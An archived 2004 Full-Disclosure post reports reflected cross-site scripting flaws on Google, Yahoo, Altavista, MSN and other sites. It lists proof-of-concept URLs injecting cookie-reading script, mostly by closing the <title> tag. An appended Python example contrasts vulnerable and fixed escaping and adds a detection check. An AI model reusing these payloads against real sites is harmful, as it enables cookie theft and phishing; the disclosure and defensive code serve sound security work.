Full Disclosure mailing list archives
Cross Site Scripting (XSS) on Google, Altavista ,Excite.com,Yahoo etc
From: "E.Kellinis" <me () cipher org uk>
Date: Sun, 25 Jul 2004 20:04:40 -0700
#########################################
Service: Search Engines
Vendors: Google, Altavista, Excite.com, Yahoo, Metacrawler, Dogpile, Downloads.com, MSN.com
Bug: Cross Site Scripting
Risk: Medium or Low or High, depends on your point of view
Exploitation: Remote
Date: 22 July 2004
Author: Emmanouel Kellinis
e-mail: me@cipher(dot)org(dot)uk
web: http://www[dot]cipher[dot]org[dot]uk
List: BugTraq(SecurityFocus)/Full-Disclosure
#########################################

Sometimes Mozilla, IE or Opera are not the main concern for an XSS attack, but the websites themselves. There is an XSS vulnerability in all the major search engine web sites, and not only those. To be honest, the following is a very small list of the "funny" XSS vulnerabilities that people don't pay the needed attention to.

The XSS vuln is inherited by anyone who is using these search engines; often there is no need to try and find a flaw in their web service directly, but you can have the same result with indirect digging.

In the following list the most usual approach is javascript poisoning inside the <title> tag. Search engines (and not only) tend to do input/output validation on the searched keyword only inside <body> and not before, so there you go, you just have to do </title> and write your stuff, or sometimes not even that.

Also you will notice that BIG websites do not pay the needed attention to other pages inside their domain except the main one. So if you can find an XSS somewhere else you can still get the client's cookie (or phish him or her), which is never a good thing!

Most of the following search engines are already informed about the problem; the ones that I didn't inform were because I couldn't find their contact details. Some of the following links may not work, but most of them will.
Google.com
http://googlesite.google.com/search?output=googleabout&site=googlesite&q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Metacrawler.com
http://www.metacrawler.com/info.metac/search/web/%253C%252Ftitle%253E%253Cbody%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E%253C%252Fbody%253E

Excite.com
http://msxml.excite.com/info.xcite/search/web/%25253C%25252Ftitle%25253E%25253Cbody%252Bbgcolor%25253D%252522blue%252522%25253E%25253Cscript%25253Ealert%252528document.cookie%252529%25253B%25253C%25252Fscript%25253E%25253C%25252Fbody%25253E

Downloads.com
http://www.download.com/3120-20-0.html?qt=%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22blue%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%2Fbody%3E&tg=dl-2001

DogPile.com
http://www.dogpile.com/info.dogpl/search/web/%253C%252Ftitle%253E%253Cbody%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E%253C%252Fbody%253E

Altavista.com
http://www.altavista.com/web/results?q=</title><body%20bgcolor="blue"><script>alert(document.cookie);</script></body>

Yahoo.com
http://us.rd.yahoo.com/reg/sc/nav/*http://www.%20<script>alert(document.cookie);</script>

MSN.com [fast response/fixed]
http://local.msn.com/results.asp?ec=&zip=</script><script>alert(document.cookie);</script><script>

and for the sake of it, securityfocus.com [fast response/fixed]:
http://www.securityfocus.com/cgi-bin/sfonline/jobs/search_jobs.pl?keyword="%20onfocus="alert(document.cookie);"

/\Side note/\
I would, and not only I, appreciate a list of security contact details of at least the Fortune 500 companies. (Sometimes it is so frustrating to find their security contacts inside their ten-billion-line website that you don't even bother!)
=========================================================
*PK: http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
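As an added example, not part of the original post: a minimal server-side rendering of the pattern the post describes, where the keyword is HTML-escaped inside <body> only and reflected raw into <title>, beside the corrected version that escapes it in every context it lands in, plus a check a defender can run over rendered pages to flag a <title> that is closed more than once. The template, the query string and the function names are constructed for this example.

```python
import html

# Constructed query of the kind the post describes: it closes the <title>
# element early so that whatever follows is parsed as markup.
BREAKOUT_QUERY = '</title><body bgcolor="blue"><script>alert(document.cookie);</script></body>'

# Hypothetical results page; the keyword is reflected in two HTML contexts.
TEMPLATE = (
    "<html><head><title>Search results for: {title_q}</title></head>\n"
    "<body><p>Results for: {body_q}</p></body></html>\n"
)


def render_body_only_escaped(q: str) -> str:
    """The weak pattern: escaping is applied to the <body> reflection only,
    while the same string goes into <title> untouched."""
    return TEMPLATE.format(title_q=q, body_q=html.escape(q, quote=True))


def render_fixed(q: str) -> str:
    """The corrected pattern: escape once, then reuse the escaped value for
    every reflection point, <title> included."""
    safe = html.escape(q, quote=True)
    return TEMPLATE.format(title_q=safe, body_q=safe)


def title_closed_early(page: str) -> bool:
    """Detection check: a well-formed results page contains exactly one
    '</title' (the template's own).  A second one means the query broke out
    of the element.  '</title' without '>' also catches '</title foo>' forms."""
    return page.lower().count("</title") != 1


def script_tag_count(page: str) -> int:
    """Number of live <script tags in the rendered page; must be 0 here since
    the template itself has none."""
    return page.lower().count("<script")


if __name__ == "__main__":
    weak = render_body_only_escaped(BREAKOUT_QUERY)
    fixed = render_fixed(BREAKOUT_QUERY)
    print("weak page breaks out of <title>:", title_closed_early(weak))
    print("fixed page breaks out of <title>:", title_closed_early(fixed))
```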